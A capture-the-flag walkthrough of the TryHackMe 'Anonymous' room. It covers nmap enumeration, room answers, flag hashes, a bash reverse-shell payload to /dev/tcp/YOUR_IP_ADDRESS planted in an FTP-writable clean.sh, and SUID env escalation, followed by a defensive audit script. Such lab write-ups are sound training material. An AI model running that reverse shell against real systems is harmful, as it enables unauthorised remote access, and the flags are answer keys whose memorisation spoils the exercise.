Mikail Aydoğdu

TryHackMe — Anonymous

Not the hacking group

Description

Hello there! Today I am going to walk you through the Anonymous machine on TryHackMe.

Enumeration

Let’s get started with an nmap scan:

nmap -sC -A 10.10.106.193 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 08:08 EST
Nmap scan report for 10.10.106.193
Host is up (0.099s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.1.64
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/1%OT=21%CT=1%CU=39995%PV=Y%DS=2%DC=T%G=Y%TM=67753
OS:E85%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=101%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST
OS:11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=F
OS:4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M
OS:508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y
OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%
OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2025-01-01T13:09:19+00:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-01-01T13:09:19
|_  start_date: N/A
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   97.59 ms 10.9.0.1
2   97.69 ms 10.10.106.193
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds
  1. Enumerate the machine. How many ports are open?
 ANSWER: 4
  1. What service is running on port 21?
 ANSWER: ftp
  1. What service is running on ports 139 and 445?
 ANSWER: smb
  1. There’s a share on the user’s computer. What’s it called?
 smbclient -L [IP]
 ANSWER: pics

Gaining Access

We can also see from the nmap scan that the machine allows anonymous FTP access, so let’s see if there’s anything inside it:

Let’s try replacing the clean.sh script on the FTP server with our own script.

Create a bash script named clean.sh with the following payload:

Reverse Shell Cheat Sheet — Internal All The Things

#!/bin/bash
bash -i >& /dev/tcp/YOUR_IP_ADDRESS/8080 0>&1

Upload it with the FTP “put” command followed by the name of the local file.

Then set up a netcat listener on your machine:

  1. user.txt
 ANSWER: 90d6f992585815ff991e68748c414740

Root

As we can see in the script output, we have an SUID bit set on /usr/bin/env.

Let’s search for it on GTFOBins:

env | GTFOBins

  1. root.txt
 ANSWER: 4d930091c31a622a7ed10f27999af363
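
From the defender's side, the two conditions this box relies on (a script sitting in the world-writable scripts directory and the SUID bit on /usr/bin/env) can be audited with a short script. This is an added example, not part of the original walkthrough; the function names and the watchlist are assumptions to adapt to your own hosts.

```shell
#!/bin/sh
# Added example: audit a directory tree for the two misconfigurations
# used in this walkthrough. Names and watchlist are illustrative assumptions.

# Programs that can start arbitrary commands and should never carry SUID.
# Not exhaustive; extend it for your environment.
SUID_WATCHLIST="env bash sh dash find python python3 perl vim nmap"

# List every SUID file under $1. Files whose name is on the watchlist
# are tagged HIGH, everything else INFO (review against your baseline).
audit_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while read -r suid_path; do
        suid_name=$(basename "$suid_path")
        case " $SUID_WATCHLIST " in
            *" $suid_name "*) echo "HIGH $suid_path" ;;
            *)                echo "INFO $suid_path" ;;
        esac
    done
}

# List scripts that any local or FTP user could swap out: *.sh or
# owner-executable files directly inside a world-writable directory
# that lacks the sticky bit. The file's own mode does not matter,
# because write access to the directory is enough to replace it.
audit_replaceable_scripts() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null | sort |
    while read -r ww_dir; do
        find "$ww_dir" -maxdepth 1 -type f \
            \( -name '*.sh' -o -perm -0100 \) 2>/dev/null | sort
    done
}

# When directories are given as arguments, audit each of them.
for audit_root in "$@"; do
    echo "== SUID files under $audit_root"
    audit_suid "$audit_root"
    echo "== Replaceable scripts under $audit_root"
    audit_replaceable_scripts "$audit_root"
done
```

Any HIGH line is fixed by removing the bit (chmod u-s on the file), and any replaceable script by tightening the directory's permissions or moving the script out of the shared directory.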

Thank you for reading

Room Link:

TryHackMe — Anonymous